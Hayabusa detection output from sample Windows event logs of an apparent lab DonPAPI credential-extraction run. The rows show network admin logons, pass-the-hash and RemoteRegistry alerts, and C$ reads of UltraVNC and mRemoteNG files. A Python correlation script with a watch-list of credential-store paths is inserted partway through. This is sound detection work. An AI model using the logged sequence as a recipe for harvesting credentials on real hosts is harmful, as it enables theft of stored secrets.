2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c0d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.601 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c0d | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c46,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c46,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c46,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724c46,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.664 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c46 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724d99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724d99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724d99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724d99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.743 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724d99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724dd2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.821 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724dd2 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724e0b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
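The rows above show one pattern repeated once per logon ID from 10.23.123.11: a 4624 type 3 logon as admmig, a 4672 admin-privilege assignment, a 5140 bind to IPC$, the Sigma pass-the-hash hit, then a 4674 against the RemoteRegistry service, while the 5145 rows under LID 0x8723c99 read UltraVNC and mRemoteNG settings over C$. The script below is an added example, not Hayabusa's code and not part of the DonPAPI tool whose sample files these are: it parses Hayabusa's CSV, splits the pipe-delimited Details column, groups events by LID and flags both the remote-registry chain and the C$ reads of secret stores. Its input is a constructed sample of rows copied from the table; the watch-list SECRET_STORE_MARKERS, the 5-second window and the function names are assumptions made for the example.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime

# Constructed sample input: rows copied verbatim from the Hayabusa CSV above
# (two of the C$ file reads and two of the network logon groups), embedded so
# the example runs offline against the same data the table shows.
SAMPLE_CSV = r"""Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724935,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724935,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724935,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.127 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724935 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x872496f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x872496f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x872496f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.189 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x872496f | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
"""

# Assumed watch-list of paths that remote credential collectors read over C$;
# seeded only from the Path values in the rows above, extend it for real use.
SECRET_STORE_MARKERS = ("ultravnc.ini", "mremoteng")


def parse_details(details):
    """Split Hayabusa's 'Key: Value | Key: Value' Details column into a dict.
    Only the first colon separates key from value, so the drive colon inside
    a Share Path value survives, and a bare 'Computer:' yields an empty value."""
    fields = {}
    for part in details.split(" | "):
        key, _, value = part.partition(":")
        fields[key.strip()] = value.strip()
    return fields


def load_rows(csv_text):
    """Parse the CSV and attach a typed EventID, parsed Details and timestamp."""
    rows = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        row["EventID"] = int(row["EventID"])
        row["fields"] = parse_details(row["Details"])
        # Hayabusa's default timestamp form, e.g. '2021-12-12 16:16:04.111 +09:00'
        row["when"] = datetime.strptime(row["Timestamp"], "%Y-%m-%d %H:%M:%S.%f %z")
        rows.append(row)
    return rows


def correlate(csv_text):
    """Group rows by Logon ID (LID) and emit two kinds of finding:
    remote_registry_chain: a type 3 logon granted admin privileges (4672) that
      binds IPC$ (5140) and then opens the RemoteRegistry service (4674);
    secret_store_read: 5145 reads over C$ of paths on the watch-list."""
    by_lid = defaultdict(list)
    for row in load_rows(csv_text):
        if row["fields"].get("LID"):
            by_lid[row["fields"]["LID"]].append(row)
    findings = []
    for lid, rows in by_lid.items():
        user = next((r["fields"]["User"] for r in rows if r["fields"].get("User")), "")
        source = next((r["fields"]["IP Addr"] for r in rows if r["fields"].get("IP Addr")), "")
        network_logon = any(r["EventID"] == 4624 and r["RuleTitle"].startswith("Logon Type 3")
                            for r in rows)
        admin_token = any(r["EventID"] == 4672 for r in rows)
        ipc_bind = any(r["EventID"] == 5140 and r["fields"].get("Share Name", "").endswith(r"\IPC$")
                       for r in rows)
        remote_registry = any(r["EventID"] == 4674 and r["fields"].get("Svc") == "RemoteRegistry"
                              for r in rows)
        if network_logon and admin_token and ipc_bind and remote_registry:
            findings.append({"kind": "remote_registry_chain", "lid": lid, "user": user,
                             "source": source, "when": min(r["when"] for r in rows)})
        secret_reads = sorted({
            r["fields"]["Path"] for r in rows
            if r["EventID"] == 5145 and r["fields"].get("Share Name", "").endswith(r"\C$")
            and any(m in r["fields"]["Path"].lower() for m in SECRET_STORE_MARKERS)})
        if secret_reads:
            findings.append({"kind": "secret_store_read", "lid": lid, "user": user,
                             "source": source, "paths": secret_reads})
    return findings


def chains_per_source(findings, window_seconds=5.0):
    """Largest number of remote_registry_chain logons from one source IP inside
    any window of window_seconds: separate LIDs from one host milliseconds
    apart, as in the rows above, is tooling iterating, not an interactive admin."""
    stamps_by_source = defaultdict(list)
    for f in findings:
        if f["kind"] == "remote_registry_chain":
            stamps_by_source[f["source"]].append(f["when"])
    result = {}
    for source, stamps in stamps_by_source.items():
        stamps.sort()
        best, start = 0, 0
        for end, t in enumerate(stamps):
            while (t - stamps[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        result[source] = best
    return result


if __name__ == "__main__":
    found = correlate(SAMPLE_CSV)
    for finding in found:
        print(finding)
    print(chains_per_source(found))
```

Against the sample this yields one secret_store_read finding for LID 0x8723c99 (both the ultravnc.ini and the mRemoteNG path) and one remote_registry_chain finding per logon ID, with both chains attributed to 10.23.123.11 inside a single window. Keying on LID rather than on user or source IP is what separates the tool-driven bursts above from a single long-lived admin session, and it is the field Hayabusa already carries in every row.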
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.884 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724e0b | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ead,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ead,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ead,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724ead,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.946 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ead | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
